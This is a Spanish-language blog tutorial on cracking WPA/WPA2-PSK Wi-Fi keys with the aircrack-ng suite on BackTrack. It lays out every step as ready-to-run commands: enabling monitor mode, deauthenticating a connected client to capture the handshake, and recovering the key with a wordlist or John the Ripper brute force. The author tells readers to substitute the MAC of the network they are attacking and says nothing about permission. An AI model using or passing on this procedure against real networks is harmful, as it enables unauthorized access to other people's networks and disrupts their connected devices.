Inicio > Hacking Wireless > Crackear WPA/WPA2/PSK

Crackear WPA/WPA2/PSK

noviembre 13, 2012 Deja un comentario Go to comments

1. Introduccion:

En este tutorial les enseñare a crackear WPA / WPA2 / PSK desde cero. En la primera parte que fue de como crackear WEPs desde cero vimos como iniciar desde el DVD de Backtrack, por lo tanto arrancaremos con la linea de comandos.

2. Colocando nuestra interface en modo monitor:

Primero debemos saber como se llama nuestra interface, para ello tipeamos:

aimon-ng
img. 1
Como vemos en la imagen, mi interface se llama wlan0. Ahora para ponerla en modo monitor tipeamos
airmon-ng start wlan0
img. 2
Como podemos ver en la imagen 2, nos pone entreparentesis “(monitor mode enabled on mon0)”, que sera la que utilizaremos.
3. Capturando el Handshake
La siguiente linea de comando scanneara las redes cercanas:
airodump-ng mon0
img. 4
img. 5
Como se puede ver, aparece una red llamada ANTRAX que sera la que atacare.
De este paso debemos tener en cuenta el canal, en este caso es 1. El BSSID y la STATION.
Una vez que sale la MAC de la red que deseamos atacar con una estacion, frenamos el scanneo presionando CTRL + C
Ahora tipearemos la siguiente linea:
airodump-ng mon0 –channel 1 –bssid D8:5D:4C:C7:DC:EE -w /tmp/wpa2
img. 6
Seguido a esto nos aparecera una imagen de la red sin clientes conectados y en otra consola tipeamos:
aireplay-ng -0 1 -a D8:5D:4C:C7:DC:EE -c 70:F1:A1:94:E8:34 mon0
img. 7
Una vez tipeado esto, podremos ver que apareceran redes en la otra consola y podremos capturar el Handshake.
img. 8
Como se puede ver en la imagen 8, hemos capturado el Handshake, ahora lo que nos queda es desencriptar la password. Esto se puede hacer de dos formas..
1 – Bruteandola con el Jonh The Ripper
2 – Por medio de Diccionario
En este tutorial veremos las dos Formas
4. Obteniendo la Clave
Para hacerla por medio de Aircrack, tipeamos la siguiente linea:
aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b D8:5D:4C:C7:DC:EE /tmp/wpa2*.cap
img. 9
En este caso estoy utilizando el diccionario que viene con Backtrack. Ustedes pueden utilizar sus propios diccionario y corrigen la ruta del mismo.
Como podran ver, ahi obtuvo la Clave y en este caso es: “thisisatest
Ahora veamos la forma de hacerlo por medio de John The Ripper.
Tipeamos el siguiente comando:
/pentest/password/jtr/john –stdout –incremental:all | aircrack-ng -b D8:5D:4C:C7:DC:EE -w – /tmp/wpa2*.cap

Recuerden cambiar la MAC por la que estan atacando y el directorio si es que lo modificaron.
Ambos metodos, tanto por diccionario como por John The Ripper suelen demorar dependiendo la dificultad de la contraseña.

5. Despedida:

Bueno, espero que les haya gustado y les sirva este tutorial y cualquier duda que tengan pueden postearla en el blog.

  1. Aún no hay comentarios.
  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Salir /  Cambiar )

Google photo

Estás comentando usando tu cuenta de Google. Salir /  Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Salir /  Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Salir /  Cambiar )

Conectando a %s

A %d blogueros les gusta esto: